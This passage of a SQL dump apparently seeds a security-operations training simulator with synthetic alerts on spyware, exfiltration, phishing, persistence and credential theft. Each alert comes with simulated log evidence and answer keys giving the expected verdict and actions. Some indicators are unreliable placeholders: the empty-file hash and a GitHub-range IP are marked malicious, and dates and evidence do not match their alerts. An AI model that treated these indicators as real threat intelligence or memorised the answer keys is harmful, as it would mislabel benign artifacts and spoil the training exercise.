activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Predator spyware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"predator.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_file_list\",\"verdict\":\"malicious\",\"details\":\"Filename associated with Predator spyware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.334Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:32:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\predator\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\Predator\\\\\\\\predator.exe\\\",\\\"user\\\":\\\"admin_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"predator.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.334Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:32:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\predator\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\Predator\\\\\\\\predator.exe\\\",\\\"user\\\":\\\"admin_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"predator.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.334Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:32:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\predator\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\Predator\\\\\\\\predator.exe\\\",\\\"user\\\":\\\"admin_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"predator.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.334Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:32:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\predator\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\Predator\\\\\\\\predator.exe\\\",\\\"user\\\":\\\"admin_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"predator.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.334Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:32:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\predator\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\Predator\\\\\\\\predator.exe\\\",\\\"user\\\":\\\"admin_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"predator.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1520, 'Data Exfiltration Detected', 'high', 'Network traffic analysis', 'Anomalous network activity detected indicating potential data exfiltration. The data exfiltration attempt was identified based on abnormal outbound traffic to a known malicious IP address. The attacker likely aimed to transfer sensitive political information from the target device to an external server.', 'Data Breach', 'T1041: Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"bytes_sent\":\"10485760\",\"filename\":\"political_activity_report.pdf\",\"username\":\"jdoe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"event_id\":\"EVT-20231012-0001\"}', '2026-03-15 19:10:11', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_asset_database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised device.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence_feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"political_activity_report.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_asset_database\",\"verdict\":\"suspicious\",\"details\":\"File containing potentially sensitive political information.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"antivirus_scan\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used for data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1521, 'Suspicious Phishing Email Detected', 'high', 'Email Gateway Logs', 'A phishing email was detected targeting key personnel with a malicious attachment designed to gain initial access. The email appeared to be sent from a compromised account with a seemingly benign PDF attachment.', 'Initial Access', 'T1566.001 - Phishing: Spearphishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T08:15:30Z\",\"email_id\":\"E123456789\",\"sender\":\"compromised_account@externaldomain.com\",\"recipient\":\"john.doe@company.com\",\"subject\":\"Quarterly Report\",\"attachment\":\"Q3_Report.pdf\",\"attachment_hash\":\"b2e98ad6f6eb8508dd6a14cfa704bad7\",\"attachment_size\":\"256KB\",\"source_ip\":\"203.0.113.45\",\"recipient_ip\":\"10.0.0.5\",\"action\":\"Quarantined\",\"reason\":\"Detected malicious attachment\"}', '2026-03-15 19:10:20', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"compromised_account@externaldomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Database\",\"verdict\":\"malicious\",\"details\":\"Known phishing domain\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"Q3_Report.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"Attachment Analysis\",\"verdict\":\"malicious\",\"details\":\"Contains macro malware\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b2e98ad6f6eb8508dd6a14cfa704bad7\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by multiple AV engines\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Associated with phishing campaigns\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Phishing Email Detected\",\"date\":\"2026-03-15T20:58:15.337Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1522, 'Malware Execution on Mobile Device', 'high', 'Mobile Device Management Logs', 'The spyware was executed on the victim\'s mobile device after an attachment was opened. The malware silently embedded itself into the device\'s system.', 'Execution', 'T1406', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:34Z\",\"device_id\":\"MD-12457\",\"user\":\"johndoe\",\"source_ip\":\"10.0.1.23\",\"external_ip\":\"185.199.108.153\",\"malware_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"invoice.pdf\",\"status\":\"executed\",\"mdm_agent\":\"v5.4.1\",\"event\":\"malware_execution\",\"description\":\"Spyware executed upon opening attachment\",\"detected_by\":\"MDM Security Module\"}', '2026-03-15 19:10:20', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected device.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with malware distribution.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known spyware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"invoice.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Suspicious filename used to deliver malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"johndoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Username of the victim, no prior malicious activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.347Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"device_id\\\":\\\"MD-12457\\\",\\\"user\\\":\\\"johndoe\\\",\\\"source_ip\\\":\\\"10.0.1.23\\\",\\\"external_ip\\\":\\\"185.199.108.153\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"invoice.pdf\\\",\\\"status\\\":\\\"executed\\\",\\\"mdm_agent\\\":\\\"v5.4.1\\\",\\\"event\\\":\\\"malware_execution\\\",\\\"description\\\":\\\"Spyware executed upon opening attachment\\\",\\\"detected_by\\\":\\\"MDM Security Module\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.347Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"device_id\\\":\\\"MD-12457\\\",\\\"user\\\":\\\"johndoe\\\",\\\"source_ip\\\":\\\"10.0.1.23\\\",\\\"external_ip\\\":\\\"185.199.108.153\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"invoice.pdf\\\",\\\"status\\\":\\\"executed\\\",\\\"mdm_agent\\\":\\\"v5.4.1\\\",\\\"event\\\":\\\"malware_execution\\\",\\\"description\\\":\\\"Spyware executed upon opening attachment\\\",\\\"detected_by\\\":\\\"MDM Security Module\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.347Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"device_id\\\":\\\"MD-12457\\\",\\\"user\\\":\\\"johndoe\\\",\\\"source_ip\\\":\\\"10.0.1.23\\\",\\\"external_ip\\\":\\\"185.199.108.153\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"invoice.pdf\\\",\\\"status\\\":\\\"executed\\\",\\\"mdm_agent\\\":\\\"v5.4.1\\\",\\\"event\\\":\\\"malware_execution\\\",\\\"description\\\":\\\"Spyware executed upon opening attachment\\\",\\\"detected_by\\\":\\\"MDM Security Module\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.347Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"device_id\\\":\\\"MD-12457\\\",\\\"user\\\":\\\"johndoe\\\",\\\"source_ip\\\":\\\"10.0.1.23\\\",\\\"external_ip\\\":\\\"185.199.108.153\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"invoice.pdf\\\",\\\"status\\\":\\\"executed\\\",\\\"mdm_agent\\\":\\\"v5.4.1\\\",\\\"event\\\":\\\"malware_execution\\\",\\\"description\\\":\\\"Spyware executed upon opening attachment\\\",\\\"detected_by\\\":\\\"MDM Security Module\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.347Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"device_id\\\":\\\"MD-12457\\\",\\\"user\\\":\\\"johndoe\\\",\\\"source_ip\\\":\\\"10.0.1.23\\\",\\\"external_ip\\\":\\\"185.199.108.153\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"invoice.pdf\\\",\\\"status\\\":\\\"executed\\\",\\\"mdm_agent\\\":\\\"v5.4.1\\\",\\\"event\\\":\\\"malware_execution\\\",\\\"description\\\":\\\"Spyware executed upon opening attachment\\\",\\\"detected_by\\\":\\\"MDM Security Module\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1523, 'Establishing Persistence on Mobile', 'high', 'Mobile Application Logs', 'The spyware modifies system settings to ensure it remains active even after device reboots, securing a foothold in the device.', 'Persistence', 'T1547.014', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:42:21Z\",\"device_id\":\"mobile-192.168.1.15\",\"user\":\"john_doe\",\"description\":\"Suspicious modification of system files detected\",\"event\":{\"type\":\"execution\",\"process\":{\"name\":\"com.android.spyware\",\"pid\":2345,\"path\":\"/system/bin/persistent_service\"},\"modification\":{\"file\":\"/system/bin/boot.sh\",\"action\":\"modified\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\"}},\"source_ip\":\"198.51.100.23\",\"internal_ip\":\"192.168.1.15\"}', '2026-03-15 19:10:20', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with mobile spyware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_analysis\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a persistent mobile spyware sample.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"/system/bin/boot.sh\",\"is_critical\":false,\"osint_result\":{\"source\":\"system_logs\",\"verdict\":\"suspicious\",\"details\":\"File modification detected related to persistence methods.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.354Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:42:21Z\\\",\\\"device_id\\\":\\\"mobile-192.168.1.15\\\",\\\"user\\\":\\\"john_doe\\\",\\\"description\\\":\\\"Suspicious modification of system files detected\\\",\\\"event\\\":{\\\"type\\\":\\\"execution\\\",\\\"process\\\":{\\\"name\\\":\\\"com.android.spyware\\\",\\\"pid\\\":2345,\\\"path\\\":\\\"/system/bin/persistent_service\\\"},\\\"modification\\\":{\\\"file\\\":\\\"/system/bin/boot.sh\\\",\\\"action\\\":\\\"modified\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}},\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.354Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:42:21Z\\\",\\\"device_id\\\":\\\"mobile-192.168.1.15\\\",\\\"user\\\":\\\"john_doe\\\",\\\"description\\\":\\\"Suspicious modification of system files detected\\\",\\\"event\\\":{\\\"type\\\":\\\"execution\\\",\\\"process\\\":{\\\"name\\\":\\\"com.android.spyware\\\",\\\"pid\\\":2345,\\\"path\\\":\\\"/system/bin/persistent_service\\\"},\\\"modification\\\":{\\\"file\\\":\\\"/system/bin/boot.sh\\\",\\\"action\\\":\\\"modified\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}},\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.354Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:42:21Z\\\",\\\"device_id\\\":\\\"mobile-192.168.1.15\\\",\\\"user\\\":\\\"john_doe\\\",\\\"description\\\":\\\"Suspicious modification of system files detected\\\",\\\"event\\\":{\\\"type\\\":\\\"execution\\\",\\\"process\\\":{\\\"name\\\":\\\"com.android.spyware\\\",\\\"pid\\\":2345,\\\"path\\\":\\\"/system/bin/persistent_service\\\"},\\\"modification\\\":{\\\"file\\\":\\\"/system/bin/boot.sh\\\",\\\"action\\\":\\\"modified\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}},\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.354Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:42:21Z\\\",\\\"device_id\\\":\\\"mobile-192.168.1.15\\\",\\\"user\\\":\\\"john_doe\\\",\\\"description\\\":\\\"Suspicious modification of system files detected\\\",\\\"event\\\":{\\\"type\\\":\\\"execution\\\",\\\"process\\\":{\\\"name\\\":\\\"com.android.spyware\\\",\\\"pid\\\":2345,\\\"path\\\":\\\"/system/bin/persistent_service\\\"},\\\"modification\\\":{\\\"file\\\":\\\"/system/bin/boot.sh\\\",\\\"action\\\":\\\"modified\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}},\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.354Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:42:21Z\\\",\\\"device_id\\\":\\\"mobile-192.168.1.15\\\",\\\"user\\\":\\\"john_doe\\\",\\\"description\\\":\\\"Suspicious modification of system files detected\\\",\\\"event\\\":{\\\"type\\\":\\\"execution\\\",\\\"process\\\":{\\\"name\\\":\\\"com.android.spyware\\\",\\\"pid\\\":2345,\\\"path\\\":\\\"/system/bin/persistent_service\\\"},\\\"modification\\\":{\\\"file\\\":\\\"/system/bin/boot.sh\\\",\\\"action\\\":\\\"modified\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}},\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1524, 'Credential Harvesting Detected', 'high', 'Network Traffic Analysis', 'The spyware has initiated credential harvesting, capturing sensitive credentials for lateral movement within the network. This is a critical step in the operation that facilitates credential theft.', 'Credential Access', 'T1110: Brute Force', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:37Z\",\"source_ip\":\"185.92.220.45\",\"destination_ip\":\"192.168.1.25\",\"protocol\":\"HTTPS\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"observed_filenames\":[\"harvest.exe\"],\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"jdoe\",\"event_type\":\"credential_harvest\",\"action\":\"login_attempt\",\"status\":\"successful\"}', '2026-03-15 19:10:20', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with previously known credential harvesting campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalNetwork\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash of known spyware used in credential harvesting.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"harvest.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareAnalysisLab\",\"verdict\":\"malicious\",\"details\":\"Executable associated with credential harvesting malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalDirectory\",\"verdict\":\"internal\",\"details\":\"User account targeted for credential theft.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1525, 'Attempted Lateral Movement to Corporate Network', 'high', 'Network Intrusion Detection System', 'The attackers, with stolen credentials, attempted to access the corporate network from a compromised mobile device. This step indicates a sophisticated lateral movement attempt, aiming to escalate their access to sensitive corporate data.', 'Lateral Movement', 'T1570: Lateral Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:22:35Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"username\":\"jdoe\",\"filename\":\"malware_payload.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"event_type\":\"lateral_movement_attempt\",\"details\":\"Unauthorized lateral movement attempt detected from external IP using compromised credentials.\"}', '2026-03-15 19:10:20', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence 